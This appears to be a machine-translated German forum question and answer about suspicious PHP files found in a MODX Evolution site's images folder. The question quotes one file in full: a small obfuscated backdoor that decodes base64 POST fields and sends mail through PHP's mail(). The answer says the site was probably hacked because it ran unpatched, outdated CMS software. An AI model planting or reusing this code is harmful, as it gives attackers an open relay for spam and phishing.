MODX evo - sind diese Fehler im Bilderordner von Assets?

Question

Es gibt seltsame PHP-Dateien in meinem modx Vermögen -> Bilder

cklxt.php.php.php.php 
cklxt.php.php.php.php.php 

Wenn ich sie öffnen, wird der Code nicht auf Bilder im Zusammenhang scheinen:

<?php 
$ixhpq = stripslashes(base64_decode($_POST['gqujwdb'])); 
$xuoh = stripslashes(base64_decode($_POST['maih'])); 
$iglrhrluhvqgr = stripslashes(base64_decode($_POST['mepouebon'])); 
$yflalhugo = stripslashes(base64_decode($_POST['cdcftxzkyrg'])); 
$nzcbxor = mail(stripslashes($ixhpq), stripslashes($xuoh), stripslashes($iglrhrluhvqgr), stripslashes($yflalhugo)); 
if($nzcbxor){echo 'nlewxnrsdqxow';} else {echo 'qhguq : ' . $nzcbxor;} 

Es gibt viele mehr ...

Sind diese PHP-Dateien drin? Oder sind sie Bugs oder die Seite wurde gehackt?

Answer 1

Evolution CMS wird offiziell nicht mehr von MODX unterstützt. Im November gab es eine Reihe schlechter Hacks, und die für die Codebasis verantwortliche Community reagierte nur langsam. Schließlich wurde ein Patch veröffentlicht, aber mit ihm gab es Hunderte anderer Codeänderungen. Es gibt viele temporäre Lösungen, um diese Hacks zu verhindern, aber es ist vielleicht am besten, einen Entwicklungsentwickler zu Rate zu ziehen, um Ihre Seite wieder normal zu machen.

Ich würde die Anwendung nicht beschuldigen, da es über 11 Jahre alt ist und nur etwa 12 CVEs hatte. Es war einfach überholt, nicht gepatcht und wurde von Revolution für fast ein halbes Jahrzehnt ersetzt.